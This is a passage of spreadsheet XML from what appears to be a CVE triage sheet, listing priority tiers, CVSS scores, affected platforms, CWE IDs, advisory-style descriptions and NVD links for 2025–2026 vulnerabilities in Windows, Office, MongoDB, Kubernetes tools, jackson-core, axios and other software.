          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="C1393" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1393" s="5" t="inlineStr"/>
      <c r="F1393" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1393" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1393" s="5" t="inlineStr"/>
      <c r="I1393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1393" s="5" t="inlineStr"/>
      <c r="K1393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1393" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="C1394" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1394" s="5" t="inlineStr"/>
      <c r="F1394" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1394" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I1394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1394" s="5" t="inlineStr"/>
      <c r="K1394" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1394" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="C1395" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1395" s="5" t="inlineStr"/>
      <c r="F1395" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1395" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H139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395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1395" s="5" t="inlineStr"/>
      <c r="K1395" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1395" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="C1396" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1396" s="5" t="inlineStr"/>
      <c r="F1396" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1396" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1396" s="5" t="inlineStr"/>
      <c r="I1396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1396" s="5" t="inlineStr"/>
      <c r="K1396" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1396" s="5" t="inlineStr">
        <is>
          <t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2,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This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M1396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="C1397" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1397" s="5" t="inlineStr"/>
      <c r="F1397" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1397" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1397" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1397" s="5" t="inlineStr"/>
      <c r="K1397" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1397" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="C1398" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1398" s="5" t="inlineStr"/>
      <c r="F1398" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1398" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1398" s="5" t="inlineStr"/>
      <c r="I1398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1398" s="5" t="inlineStr"/>
      <c r="K1398" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1398" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="M1398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="C1399" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1399" s="5" t="inlineStr"/>
      <c r="F1399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1399" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H139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99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1399" s="5" t="inlineStr"/>
      <c r="K1399" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1399" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="C1400" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1400" s="5" t="inlineStr"/>
      <c r="F1400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1400" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1400" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1400" s="5" t="inlineStr"/>
      <c r="K1400" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1400" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="C1401" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1401" s="5" t="inlineStr"/>
      <c r="F1401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1401" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H140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401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1401" s="5" t="inlineStr"/>
      <c r="K1401" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1401" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85594</t>
        </is>
      </c>
      <c r="C1402" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1402" s="5" t="inlineStr"/>
      <c r="F1402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1402" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1402" s="5" t="inlineStr"/>
      <c r="I1402" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1402" s="5" t="inlineStr"/>
      <c r="K1402" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1402" s="5" t="inlineStr">
        <is>
          <t>Traefik versions from v3.7.1 fail to enforce crossProviderNamespaces restrictions on the traefik.ingress.kubernetes.io/service.middlewares Service annotation in the Kubernetes Ingress provider. A namespace-limited tenant excluded from the allowlist can attach an operator-owned middleware to its Service, and if that middleware injects backend credentials, recover them at a controlled backend.</t>
        </is>
      </c>
      <c r="M1402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85594</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1403" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15613</t>
        </is>
      </c>
      <c r="C1403" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1403" s="5" t="inlineStr"/>
      <c r="F1403" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1403" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1403" s="5" t="inlineStr"/>
      <c r="I1403" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1403" s="5" t="inlineStr"/>
      <c r="K1403" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1403" s="5" t="inlineStr">
        <is>
          <t>Kyverno before v1.13.4 is vulnerable to server-side request forgery (SSRF) via its Service Call functionality. An attacker with permission to create Kyverno (Cluster)Policies can specify an external URL in a policy's apiCall/service configuration; although Service Call is documented for in-cluster services, it also resolves external addresses, allowing requests to an attacker-controlled server. Because policy context data (including contents of Kubernetes resources such as secrets) is sent in these requests, an attacker can exfiltrate sensitive cluster data.</t>
        </is>
      </c>
      <c r="M1403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15613</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15417</t>
        </is>
      </c>
      <c r="C1404" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1404" s="5" t="inlineStr"/>
      <c r="F1404" s="5" t="inlineStr"/>
      <c r="G1404" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1404" s="5" t="inlineStr"/>
      <c r="I1404" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1404" s="5" t="inlineStr"/>
      <c r="K1404" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L1404" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys Windows 8 driver for CP210x devices, a local unprivileged user can use incorrect driver settings to cause a kernel crash.</t>
        </is>
      </c>
      <c r="M1404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15417</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15933</t>
        </is>
      </c>
      <c r="C1405" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1405" s="5" t="inlineStr"/>
      <c r="F1405" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1405" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1405" s="5" t="inlineStr"/>
      <c r="I1405" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1405" s="5" t="inlineStr"/>
      <c r="K1405" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="L1405" s="5" t="inlineStr">
        <is>
          <t>OptimiDoc Server (On-Premise) stores credentials for external services in cleartext. An authenticated administrator can view previously configured service passwords, including SMTP, FTP (for scan delivery), Active Directory (for user list import), and SharePoint credentials, in cleartext via the web administration panel page source, allowing exposure of sensitive third-party authentication data.
This issue was fixed in version 26.08</t>
        </is>
      </c>
      <c r="M1405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15933</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18401</t>
        </is>
      </c>
      <c r="C1406" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1406" s="5" t="inlineStr"/>
      <c r="F1406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1406" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1406" s="5" t="inlineStr"/>
      <c r="I1406" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1406" s="5" t="inlineStr"/>
      <c r="K1406" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1406" s="5" t="inlineStr">
        <is>
          <t>The non-blocking (asynchronous) JSON parser in jackson-core does not enforce the maxNumberLength constraint defined in StreamReadConstraints (default: 1000 characters). An attacker able to submit JSON to an application that uses the async parser API can supply a number token of arbitrary length, leading to excessive memory allocation and potential CPU exhaustion, resulting in a denial of service.
The synchronous parser enforces this limit correctly, so the constraint is applied inconsistently depending on which parsing API the application uses.
Root cause: the async parsing path in NonBlockingUtf8JsonParserBase and related classes never invokes the number length validation methods. Number parsing methods such as _finishNumberIntegralPart() accumulate digits into the TextBuffer without any length check, then call _valueComplete() to finalize the token. _valueComplete() does not call resetInt() or resetFloat(), which are the methods in ParserBase where validateIntegerLength() and validateFPLength() are performed. Because that validation step is skipped, maxNumberLength is never enforced on the async code path.
Impact: an attacker sending a JSON document containing an arbitrarily long number to an application using the async parser (for example a Spring WebFlux or other reactive application) can cause unbounded allocation in the TextBuffer and an OutOfMemoryError. If the application subsequently calls getBigIntegerValue() or getDecimalValue(), the JVM may additionally be tied up in O(n^2) BigInteger parsing, causing CPU-based denial of service.
No privileges or user interaction beyond the ability to submit data for parsing are required.
This issue affects com.fasterxml.jackson.core:jackson-core from version 2.15.0 through 2.18.5 and from 2.19.0 through 2.21.0, and tools.jackson.core:jackson-core from 3.0.0 through 3.0.x.
Versions prior to 2.15.0 are not affected, because StreamReadConstraints -- which defines the maxNumberLength setting -- was first introduced in jackson-core 2.15.0, so no such constraint exists to be bypassed in earlier releases. Note that GHSA-72hv-8253-57qq records the lower bound of the affected 2.x range as 2.0.0.</t>
        </is>
      </c>
      <c r="M1406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18401</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21098</t>
        </is>
      </c>
      <c r="C1407" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1407" s="5" t="inlineStr"/>
      <c r="F1407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1407" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1407" s="5" t="inlineStr"/>
      <c r="I1407" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1407" s="5" t="inlineStr"/>
      <c r="K1407" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1407" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Link to Windows prior to SMR Sep-2026 Release 1 allows local attackers to establish a connection with the PC without proper user interaction.</t>
        </is>
      </c>
      <c r="M1407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21098</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39892</t>
        </is>
      </c>
      <c r="C1408" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1408" s="5" t="inlineStr"/>
      <c r="F1408" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1408" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1408" s="5" t="inlineStr">
        <is>
          <t>cryptography.io:cryptography</t>
        </is>
      </c>
      <c r="I1408" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1408" s="5" t="inlineStr"/>
      <c r="K1408" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-131</t>
        </is>
      </c>
      <c r="L1408" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 45.0.0 to before 46.0.7, if a non-contiguous buffer was passed to APIs which accepted Python buffers (e.g. Hash.update()), this could lead to buffer overflows. This vulnerability is fixed in 46.0.7.</t>
        </is>
      </c>
      <c r="M1408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39892</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42039</t>
        </is>
      </c>
      <c r="C1409" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1409" s="5" t="inlineStr"/>
      <c r="F1409" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1409" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1409" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1409" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J1409" s="5" t="inlineStr"/>
      <c r="K1409" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770</t>
        </is>
      </c>
      <c r="L1409" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M1409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42039</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52873</t>
        </is>
      </c>
      <c r="C1410" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1410" s="5" t="inlineStr"/>
      <c r="F1410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1410" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1410" s="5" t="inlineStr"/>
      <c r="I1410" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1410" s="5" t="inlineStr"/>
      <c r="K1410" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="L1410" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. From version 2.5.0 until version 2.6.0, the wyzie-open-redeem IPC handler in index.js creates the partition:wyzie-redeem Electron session and registers an onHeadersReceived hook that removes the Content-Security-Policy header from every response in that session. The redeem window also lacks a setWindowOpenHandler restriction, so script injection in sub.wyzie.io, a loaded third-party resource, or a site reached through navigation executes without CSP constraints and can affect additional windows and persistent session storage. A user must open the Wyzie API key redemption window, and exploitation requires attacker-controlled script content in a loaded page. The resulting renderer script can invoke renderer-exposed application functionality and can be chained with other vulnerabilities to access internal services or sensitive data. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M1410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52873</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54272</t>
        </is>
      </c>
      <c r="C1411" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1411" s="5" t="inlineStr"/>
      <c r="F1411" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1411" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1411" s="5" t="inlineStr"/>
      <c r="I1411" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J1411" s="5" t="inlineStr"/>
      <c r="K1411" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L1411" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Versions 10.1.1 through 10.2.0 are vulnerable to SSRF through misclassification of IPv4-mapped/NAT64 IPv6 addresses. Address6.getType() classifies an address by matching it against a table of known IPv6 special-use prefixes, returning Global unicast when nothing matches. That table had no entry for the IPv4-mapped range (::ffff:0:0/96), so every mapped address fell through to Global unicast; NAT64 addresses matched their own NAT64 … labels. The boolean checks isLoopback, isUnspecified, and isMulticast compared getType() against a fixed label and so returned false, while isLinkLocal and isULA checked only the native IPv6 ranges. The library already exposed isMapped4() and to4(), but did not apply them inside these checks, so a mapped or NAT64 address was never normalized to its embedded IPv4 address before classification. For IPv4-mapped addresses the host OS routes to the IPv4 stack, so the misclassification is reachable on any dual-stack host. For NAT64, the classification bypass is unconditional but end-to-end reachability additionally requires a NAT64/DNS64 gateway in the deployment network.This issue has been fixed in version 10.2.1.</t>
        </is>
      </c>
      <c r="M1411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54272</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55758</t>
        </is>
      </c>
      <c r="C1412" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1412" s="5" t="inlineStr"/>
      <c r="F1412" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1412" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1412" s="5" t="inlineStr"/>
      <c r="I1412" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1412" s="5" t="inlineStr"/>
      <c r="K1412" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1412" s="5" t="inlineStr">
        <is>
